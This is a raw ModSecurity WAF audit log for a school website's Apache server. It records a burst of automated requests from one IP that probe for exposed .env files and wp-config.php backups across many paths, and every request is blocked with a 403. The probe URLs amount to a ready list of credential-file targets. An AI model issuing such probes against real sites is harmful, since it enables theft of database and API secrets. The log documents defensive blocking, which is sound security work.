Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --031b0047-Z-- --66337f3e-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtgAAAA4 103.236.140.4 38476 103.236.140.4 8181 --66337f3e-B-- GET /development/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --66337f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66337f3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908507388 13223 (- - -) Stopwatch2: 1745151908507388 13223; combined=25325, p1=218, p2=0, p3=0, p4=0, p5=12572, sr=67, sw=0, l=0, gc=12535 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66337f3e-Z-- --44797d0a-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6gAAAE0 103.236.140.4 38478 103.236.140.4 8181 --44797d0a-B-- GET /.docker/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --44797d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44797d0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908577632 722 (- - -) Stopwatch2: 1745151908577632 722; combined=295, p1=264, p2=0, p3=0, p4=0, p5=30, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44797d0a-Z-- --45561f3b-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6wAAAEc 103.236.140.4 38480 103.236.140.4 8181 --45561f3b-B-- GET /wp-admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --45561f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45561f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908717195 718 (- - -) Stopwatch2: 1745151908717195 718; combined=281, p1=244, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45561f3b-Z-- --81173a73-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtwAAAAc 103.236.140.4 38482 103.236.140.4 8181 --81173a73-B-- GET /project/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --81173a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81173a73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908787274 715 (- - -) Stopwatch2: 1745151908787274 715; combined=260, p1=221, p2=0, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81173a73-Z-- --a06ea722-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NuQAAAAA 103.236.140.4 38488 103.236.140.4 8181 --a06ea722-B-- GET /wp-includes/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a06ea722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06ea722-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908857467 640 (- - -) Stopwatch2: 1745151908857467 640; combined=247, p1=219, p2=0, p3=0, p4=0, p5=27, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06ea722-Z-- --0a504721-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ7AAAAEk 103.236.140.4 38490 103.236.140.4 8181 --0a504721-B-- GET /wp-content/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --0a504721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a504721-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908927383 660 (- - -) Stopwatch2: 1745151908927383 660; combined=249, p1=222, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a504721-Z-- --8c734c6d-A-- [20/Apr/2025:19:25:08 +0700] aATnpMTCDeBrh52UaHS-UQAAAII 103.236.140.4 38492 103.236.140.4 8181 --8c734c6d-B-- GET /storage/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8c734c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c734c6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908998178 756 (- - -) Stopwatch2: 1745151908998178 756; combined=309, p1=262, p2=0, p3=0, p4=0, p5=47, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c734c6d-Z-- --042bf335-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7QAAAEs 103.236.140.4 38494 103.236.140.4 8181 --042bf335-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --042bf335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --042bf335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909068108 719 (- - -) Stopwatch2: 1745151909068108 719; combined=291, p1=255, p2=0, p3=0, p4=0, p5=36, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --042bf335-Z-- --1a1d6e7b-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7gAAAFc 103.236.140.4 38496 103.236.140.4 8181 --1a1d6e7b-B-- GET /log/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --1a1d6e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1d6e7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909138193 770 (- - -) Stopwatch2: 1745151909138193 770; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1d6e7b-Z-- --d9667364-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7wAAAEE 103.236.140.4 38498 103.236.140.4 8181 --d9667364-B-- GET /index/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d9667364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9667364-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909208349 667 (- - -) Stopwatch2: 1745151909208349 667; combined=248, p1=214, p2=0, p3=0, p4=0, p5=33, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9667364-Z-- --876f4252-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8AAAAEY 103.236.140.4 38500 103.236.140.4 8181 --876f4252-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --876f4252-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --876f4252-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909277645 656 (- - -) Stopwatch2: 1745151909277645 656; combined=257, p1=216, p2=0, p3=0, p4=0, p5=40, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --876f4252-Z-- --10392b58-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8QAAAFU 103.236.140.4 38502 103.236.140.4 8181 --10392b58-B-- GET /src/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --10392b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10392b58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909347510 668 (- - -) Stopwatch2: 1745151909347510 668; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10392b58-Z-- --4d46d65f-A-- [20/Apr/2025:19:25:09 +0700] aATnpVu16wJWB6g0mU8NugAAAA8 103.236.140.4 38504 103.236.140.4 8181 --4d46d65f-B-- GET /production/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4d46d65f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d46d65f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909416693 649 (- - -) Stopwatch2: 1745151909416693 649; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d46d65f-Z-- --f3cb5f66-A-- [20/Apr/2025:19:25:09 +0700] aATnpVu16wJWB6g0mU8NuwAAAA0 103.236.140.4 38506 103.236.140.4 8181 --f3cb5f66-B-- GET /new/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --f3cb5f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cb5f66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909486363 669 (- - -) Stopwatch2: 1745151909486363 669; combined=275, p1=247, p2=0, p3=0, p4=0, p5=27, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cb5f66-Z-- --5e7ffa2e-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8gAAAEM 103.236.140.4 38508 103.236.140.4 8181 --5e7ffa2e-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5e7ffa2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e7ffa2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909556321 721 (- - -) Stopwatch2: 1745151909556321 721; combined=303, p1=271, p2=0, p3=0, p4=0, p5=32, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e7ffa2e-Z-- --55e71b60-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ8wAAAFE 103.236.140.4 38510 103.236.140.4 8181 --55e71b60-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --55e71b60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e71b60-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909625392 729 (- - -) Stopwatch2: 1745151909625392 729; combined=277, p1=240, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55e71b60-Z-- --3a279456-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9AAAAEQ 103.236.140.4 38512 103.236.140.4 8181 --3a279456-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3a279456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a279456-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909694755 642 (- - -) Stopwatch2: 1745151909694755 642; combined=252, p1=224, p2=0, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a279456-Z-- --fcd07176-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9QAAAEI 103.236.140.4 38514 103.236.140.4 8181 --fcd07176-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --fcd07176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcd07176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909763961 643 (- - -) Stopwatch2: 1745151909763961 643; combined=239, p1=212, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcd07176-Z-- --8c867964-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ9gAAAEo 103.236.140.4 38516 103.236.140.4 8181 --8c867964-B-- GET /wp-config.php-backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8c867964-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c867964-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909834061 642 (- - -) Stopwatch2: 1745151909834061 642; combined=261, p1=235, p2=0, p3=0, p4=0, p5=26, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
